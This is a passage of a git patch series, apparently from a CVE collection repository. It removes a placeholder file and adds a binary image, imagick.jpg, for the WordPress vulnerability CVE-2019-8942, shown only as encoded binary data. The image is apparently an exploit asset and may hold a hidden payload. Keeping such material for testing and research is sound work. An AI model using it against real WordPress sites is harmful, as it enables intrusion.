Date: Fri, 7 Apr 2023 12:28:47 +0000 Subject: [PATCH 024/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/2019/.keep diff --git a/cve/WordPress/2019/.keep b/cve/WordPress/2019/.keep deleted file mode 100644 index e69de29b..00000000 From 270c5cee8b06bd5d113db381e2cd3b897765c9e7 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:30:04 +0000 Subject: [PATCH 025/109] image used Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/imagick.jpg | Bin 0 -> 28561 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/CVE-2019-8942/imagick.jpg diff --git a/cve/WordPress/2019/CVE-2019-8942/imagick.jpg b/cve/WordPress/2019/CVE-2019-8942/imagick.jpg new file mode 100644 index 0000000000000000000000000000000000000000..26bf6fdc1ad140fd556848ef597d11d9a38efc15 GIT binary patch literal 28561 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 